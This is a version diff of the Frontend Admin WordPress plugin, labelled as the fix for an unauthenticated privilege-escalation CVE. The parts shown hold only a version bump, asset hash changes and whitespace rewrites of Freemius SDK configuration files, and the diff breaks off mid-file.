CVE-2026-6228: Frontend Admin by DynamiApps <= 3.28.36 – Unauthenticated Privilege Escalation via Edit User Form (acf-frontend-form-element)

--- a/acf-frontend-form-element/acf-frontend.php
+++ b/acf-frontend-form-element/acf-frontend.php
@@ -3,7 +3,7 @@
  * Plugin Name: Frontend Admin
  * Plugin URI:  https://www.dynamiapps.com/frontend-admin/
  * Description: This awesome plugin allows you to easily display admin forms to the frontend of your site so your clients can easily edit content on their own from the frontend.
- * Version:     3.28.36
+ * Version:     3.29.1
  * Author:      Shabti Kaplan
  * Author URI:  https://www.dynamiapps.com/
  * Text Domain: frontend-admin
--- a/acf-frontend-form-element/assets/build/form/index.asset.php
+++ b/acf-frontend-form-element/assets/build/form/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-i18n'), 'version' => '0768e63a935e7aa68d61');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-i18n'), 'version' => '4b9544a4072563171b25');
--- a/acf-frontend-form-element/assets/build/payment-form/index.asset.php
+++ b/acf-frontend-form-element/assets/build/payment-form/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-i18n'), 'version' => 'c3a29bc093858bbbc3e9');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-i18n'), 'version' => 'a429a12050e0d1e41020');
--- a/acf-frontend-form-element/assets/build/step/index.asset.php
+++ b/acf-frontend-form-element/assets/build/step/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-i18n'), 'version' => '4478c8f91c6e02b04a65');
+<?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-i18n'), 'version' => 'f3d5315daff0a4f61f92');
--- a/acf-frontend-form-element/assets/build/steps/index.asset.php
+++ b/acf-frontend-form-element/assets/build/steps/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-i18n'), 'version' => '31e673737db608687854');
+<?php return array('dependencies' => array('wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-i18n'), 'version' => '5b1a3a3da431d8710d0e');
--- a/acf-frontend-form-element/main/admin/admin-pages/forms/post-types.php
+++ b/acf-frontend-form-element/main/admin/admin-pages/forms/post-types.php
@@ -51,15 +51,15 @@
 			'slug'       => $dashboard_slug,
 		),
 		    'capability_type' => 'post',
-    'map_meta_cap' => true,
-    'capabilities' => [
-        'create_posts' => 'manage_options',
-        'edit_posts' => 'manage_options',
-        'edit_others_posts' => 'manage_options',
-        'publish_posts' => 'manage_options',
-        'read_private_posts' => 'manage_options',
-        'delete_posts' => 'manage_options',
-    ],
+    	'map_meta_cap' => true,
+		'capabilities' => [
+			'create_posts' => 'manage_options',
+			'edit_posts' => 'manage_options',
+			'edit_others_posts' => 'manage_options',
+			'publish_posts' => 'manage_options',
+			'read_private_posts' => 'manage_options',
+			'delete_posts' => 'manage_options',
+		],
 		'query_var'         => false,
 	);
 	register_post_type( 'admin_form', $args );
--- a/acf-frontend-form-element/main/freemius/assets/css/admin/index.php
+++ b/acf-frontend-form-element/main/freemius/assets/css/admin/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/acf-frontend-form-element/main/freemius/assets/css/index.php
+++ b/acf-frontend-form-element/main/freemius/assets/css/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/acf-frontend-form-element/main/freemius/assets/img/index.php
+++ b/acf-frontend-form-element/main/freemius/assets/img/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/acf-frontend-form-element/main/freemius/assets/index.php
+++ b/acf-frontend-form-element/main/freemius/assets/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/acf-frontend-form-element/main/freemius/assets/js/index.php
+++ b/acf-frontend-form-element/main/freemius/assets/js/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/acf-frontend-form-element/main/freemius/config.php
+++ b/acf-frontend-form-element/main/freemius/config.php
@@ -1,391 +1,391 @@
-<?php
-    /**
-     * @package     Freemius
-     * @copyright   Copyright (c) 2015, Freemius, Inc.
-     * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
-     * @since       1.0.4
-     */
-
-    if ( ! defined( 'ABSPATH' ) ) {
-        exit;
-    }
-
-    if ( ! defined( 'WP_FS__SLUG' ) ) {
-        define( 'WP_FS__SLUG', 'freemius' );
-    }
-    if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
-        define( 'WP_FS__DEV_MODE', false );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region API Connectivity Issues Simulation
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
-        define( 'WP_FS__SIMULATE_NO_CURL', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
-    }
-    if ( WP_FS__SIMULATE_NO_CURL ) {
-        define( 'FS_SDK__SIMULATE_NO_CURL', true );
-    }
-    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
-        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
-    }
-    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
-        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
-        define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
-    }
-
-    if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
-        /**
-         * @since  1.1.7.3
-         * @author Vova Feldman (@svovaf)
-         *
-         * I'm not sure if shared servers periodically change IP, or the subdomain of the
-         * admin dashboard. Also, I've seen sites that have strange loop of switching
-         * between domains on a daily basis. Therefore, to eliminate the risk of
-         * multiple unwanted connectivity test pings, temporary ignore domain or
-         * server IP changes.
-         */
-        define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
-    }
-
-    /**
-     * If your dev environment supports custom public network IP setup
-     * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
-     * and uncomment it during dev.
-     */
-    if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
-        // VVV default public network IP.
-        define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
-
-//		define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
-    }
-
-    /**
-     * If true and running with secret key, the opt-in process
-     * will skip the email activation process which is invoked
-     * when the email of the context user already exist in Freemius
-     * database (as a security precaution, to prevent sharing user
-     * secret with unauthorized entity).
-     *
-     * IMPORTANT:
-     *      AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
-     *      THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
-     *      CLOCK IS SYNCED.
-     */
-    if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
-        define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
-    }
-
-
-    #--------------------------------------------------------------------------------
-    #region Directories
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__DIR' ) ) {
-        define( 'WP_FS__DIR', dirname( __FILE__ ) );
-    }
-    if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
-        define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
-    }
-    if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
-        define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
-    }
-    if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
-        define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
-    }
-    if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
-        define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
-    }
-    if ( ! defined( 'WP_FS__DIR_JS' ) ) {
-        define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
-    }
-    if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
-        define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
-    }
-    if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
-        define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
-    }
-
-    #endregion
-
-    /**
-     * Domain / URL / Address
-     */
-    define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
-    define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
-    define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
-
-    if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
-        define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
-    }
-    if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
-    }
-
-    if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
-        define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region HTTP
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
-        define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
-    }
-
-    if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
-        define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
-                                     // Checks if CloudFlare's HTTPS (Flexible SSL support).
-                                     isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
-                                     'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
-                                   ) ||
-                                   // Check if HTTPS request.
-                                   ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
-                                   ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
-        );
-    }
-
-    if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
-        define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
-                                            strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
-    }
-
-    if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
-        define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
-    }
-
-    if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
-        if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
-            define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
-        } else {
-            define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
-                                           is_string( WP_FS__REMOTE_ADDR ) &&
-                                           ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
-                                             WP_FS__REMOTE_ADDR === '::1' )
-            );
-        }
-    }
-
-    if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
-        define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
-                                                    false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
-        // By default, run with Freemius production servers.
-        define( 'WP_FS__IS_PRODUCTION_MODE', true );
-    }
-
-    if ( ! defined( 'WP_FS__ADDRESS' ) ) {
-        define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
-    }
-
-
-    #--------------------------------------------------------------------------------
-    #region API
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
-    }
-    if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
-    }
-
-    // Set API address for local testing.
-    if ( ! WP_FS__IS_PRODUCTION_MODE ) {
-        if ( ! defined( 'FS_API__ADDRESS' ) ) {
-            define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
-        }
-        if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
-            define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
-        }
-    }
-
-    #endregion
-
-    #--------------------------------------------------------------------------------
-    #region Checkout
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
-    }
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
-    }
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
-    }
-
-    #endregion
-
-    define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
-
-    if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
-        define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
-    }
-    if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
-        define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
-    }
-    if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
-        define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
-    }
-    define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
-
-    /**
-     * Module types
-     *
-     * @since 1.2.2
-     */
-    define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
-    define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
-
-    /**
-     * Billing Frequencies
-     */
-    define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
-    define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
-    define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
-
-    /**
-     * Plans
-     */
-    define( 'WP_FS__PLAN_DEFAULT_PAID', false );
-    define( 'WP_FS__PLAN_FREE', 'free' );
-    define( 'WP_FS__PLAN_TRIAL', 'trial' );
-
-    /**
-     * Times in seconds
-     */
-    if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
-    }
-    if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
-    }
-//	define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
-    if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
-    }
-    if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
-    }
-    if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region Debugging
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
-        $debug_mode = get_option( 'fs_debug_mode', null );
-
-        if ( $debug_mode === null ) {
-            $debug_mode = false;
-            add_option( 'fs_debug_mode', $debug_mode );
-        }
-
-        define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
-    }
-
-    if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
-        define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
-    }
-    if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
-        define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
-    }
-    if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
-        define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
-    }
-
-    if ( WP_FS__ECHO_DEBUG_SDK ) {
-        error_reporting( E_ALL );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
-        define( 'WP_FS__SCRIPT_START_TIME', time() );
-    }
-    if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
-        define( 'WP_FS__DEFAULT_PRIORITY', 10 );
-    }
-    if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
-        define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region Multisite Network
-    #--------------------------------------------------------------------------------
-
-    /**
-     * Do not use this define directly, it will have the wrong value
-     * during plugin uninstall/deletion when the inclusion of the plugin
-     * is triggered due to registration with register_uninstall_hook().
-     *
-     * Instead, use fs_is_network_admin().
-     *
-     * @author Vova Feldman (@svovaf)
-     */
-    if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
-        define( 'WP_FS__IS_NETWORK_ADMIN',
-            is_multisite() &&
-            ( is_network_admin() ||
-              ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
-                  ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
-                    ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
-                ) ||
-                // Plugin uninstall.
-                defined( 'WP_UNINSTALL_PLUGIN' ) )
-            )
-        );
-    }
-
-    /**
-     * Do not use this define directly, it will have the wrong value
-     * during plugin uninstall/deletion when the inclusion of the plugin
-     * is triggered due to registration with register_uninstall_hook().
-     *
-     * Instead, use fs_is_blog_admin().
-     *
-     * @author Vova Feldman (@svovaf)
-     */
-    if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
-        define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
-    }
-
-    if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
-        // Set to true to show network level settings even if delegated to site admins.
-        define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
-        define( 'WP_FS__DEMO_MODE', false );
-    }
-    if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
-        define( 'FS_SDK__SSLVERIFY', false );
-    }
+<?php
+    /**
+     * @package     Freemius
+     * @copyright   Copyright (c) 2015, Freemius, Inc.
+     * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+     * @since       1.0.4
+     */
+
+    if ( ! defined( 'ABSPATH' ) ) {
+        exit;
+    }
+
+    if ( ! defined( 'WP_FS__SLUG' ) ) {
+        define( 'WP_FS__SLUG', 'freemius' );
+    }
+    if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
+        define( 'WP_FS__DEV_MODE', false );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region API Connectivity Issues Simulation
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
+        define( 'WP_FS__SIMULATE_NO_CURL', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
+    }
+    if ( WP_FS__SIMULATE_NO_CURL ) {
+        define( 'FS_SDK__SIMULATE_NO_CURL', true );
+    }
+    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
+        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
+    }
+    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
+        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
+        define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
+    }
+
+    if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
+        /**
+         * @since  1.1.7.3
+         * @author Vova Feldman (@svovaf)
+         *
+         * I'm not sure if shared servers periodically change IP, or the subdomain of the
+         * admin dashboard. Also, I've seen sites that have strange loop of switching
+         * between domains on a daily basis. Therefore, to eliminate the risk of
+         * multiple unwanted connectivity test pings, temporary ignore domain or
+         * server IP changes.
+         */
+        define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
+    }
+
+    /**
+     * If your dev environment supports custom public network IP setup
+     * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
+     * and uncomment it during dev.
+     */
+    if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
+        // VVV default public network IP.
+        define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
+
+//		define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
+    }
+
+    /**
+     * If true and running with secret key, the opt-in process
+     * will skip the email activation process which is invoked
+     * when the email of the context user already exist in Freemius
+     * database (as a security precaution, to prevent sharing user
+     * secret with unauthorized entity).
+     *
+     * IMPORTANT:
+     *      AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
+     *      THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
+     *      CLOCK IS SYNCED.
+     */
+    if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
+        define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
+    }
+
+
+    #--------------------------------------------------------------------------------
+    #region Directories
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__DIR' ) ) {
+        define( 'WP_FS__DIR', dirname( __FILE__ ) );
+    }
+    if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
+        define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
+    }
+    if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
+        define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
+    }
+    if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
+        define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
+    }
+    if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
+        define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
+    }
+    if ( ! defined( 'WP_FS__DIR_JS' ) ) {
+        define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
+    }
+    if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
+        define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
+    }
+    if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
+        define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
+    }
+
+    #endregion
+
+    /**
+     * Domain / URL / Address
+     */
+    define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
+    define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
+    define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
+
+    if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
+        define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
+    }
+    if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
+    }
+
+    if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
+        define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region HTTP
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
+        define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
+    }
+
+    if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
+        define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
+                                     // Checks if CloudFlare's HTTPS (Flexible SSL support).
+                                     isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
+                                     'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
+                                   ) ||
+                                   // Check if HTTPS request.
+                                   ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
+                                   ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
+        );
+    }
+
+    if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
+        define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
+                                            strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
+    }
+
+    if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
+        define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
+    }
+
+    if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
+        if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
+            define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
+        } else {
+            define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
+                                           is_string( WP_FS__REMOTE_ADDR ) &&
+                                           ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
+                                             WP_FS__REMOTE_ADDR === '::1' )
+            );
+        }
+    }
+
+    if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
+        define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
+                                                    false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
+        // By default, run with Freemius production servers.
+        define( 'WP_FS__IS_PRODUCTION_MODE', true );
+    }
+
+    if ( ! defined( 'WP_FS__ADDRESS' ) ) {
